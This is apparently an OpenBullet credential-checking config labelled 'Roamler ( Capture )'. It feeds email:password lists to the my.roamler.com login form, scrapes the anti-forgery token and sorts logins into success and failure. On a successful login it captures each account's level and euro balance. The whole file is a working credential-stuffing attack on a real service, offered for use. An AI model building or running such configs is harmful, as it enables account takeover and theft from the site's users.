[SETTINGS]
{
  "Name": "Roamler ( Capture )",
  "SuggestedBots": 5,
  "LastModified": "2018-07-01T03:21:36.5311734+00:00",
  "AdditionalInfo": "",
  "Author": "Marine",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://my.roamler.com/Account/Logon?returnAddress=%2FAccount%2F" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://my.roamler.com/Account/Logon?returnAddress=%2FAccount%2F" 
  HEADER "origin: https://my.roamler.com" 
#CAPTURE_TOKEN PARSE "<SOURCE>" LR " <input name=\"__RequestVerificationToken\" type=\"hidden\" value=\"" "\" />" Recursive=FALSE -> VAR "Token" "" "" 
REQUEST POST "https://my.roamler.com/Account/Logon?returnAddress=%2FAccount%2F" AutoRedirect=TRUE 
  CONTENT "__RequestVerificationToken=<Token>&Email=<USER>&oauth_token=&Password=<PASS>&RememberMe=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://my.roamler.com/Account/Logon?returnAddress=%2FAccount%2F" 
  HEADER "origin: https://my.roamler.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Login failed" 
  KEYCHAIN Success OR 
    KEY "<title>Tableau de bord</title>" 
#CAPTURE_LVL PARSE "<SOURCE>" LR "Level" "(0 XP)<br/>" Recursive=FALSE -> CAP "Level" "" "" 
#CAPTURE_BALANCE PARSE "<SOURCE>" LR "€" "</div>" Recursive=FALSE -> CAP "Balance" "" "€" 
